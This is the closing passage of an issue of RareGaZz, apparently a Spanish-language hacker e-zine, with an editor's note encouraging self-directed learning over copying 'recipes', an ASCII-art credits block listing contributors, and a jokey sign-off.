 hacking, simplemente GANAS -MUCHAS GANAS- de aprender y estar atentos...

 Espero a alguno de ustedes le sirva este pequeo texto que inclui en este
 numero sin avisarle a nadie. Creo es necesario que aparezcan hackers con
 ideas propias, con inventiva, con ganas de buscar y aprender. No solo
 aquellos que busquen 'recetas de cocina' para hacer esto o aquello. Las
 personas que buscan ese tipo de recetas son, para mi, los lamerz.

                            RareTrip@Cyberdude.com
                            "If it moves, kiss it!"

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]


 Hasta la proxima! Enjoy the sunrise, tomorrow may not be there...

         !                      Editor: RareTrip
        -$-              Colaboradores: LePompeItor, Mr.X, KillerBot,
         !    *                         CrackSmoker y Psycho Tranze.
   +    /^   |              Perdedores: Kasparov.
   !    | |//^  _^_            De moda: Deep Blue.
  /^  /   @ |  /_-_    Agradecimientos: (ver abajo)
  |@ _| @     @|- - -|    Nuestro odio: (ver arriba)
  |  | |    /^ |  _  |           Wired: RareGaZz
  |___/____|_|_|_(_)_|           Tired: PcComputing, PcMagaZine, Link,
                                        Internet World, PcMedia, etc.
                            Comentario: Nihil obstat & non plus ultra.

    <<::RareGaZz::>>
"El Abogado del Diablo"
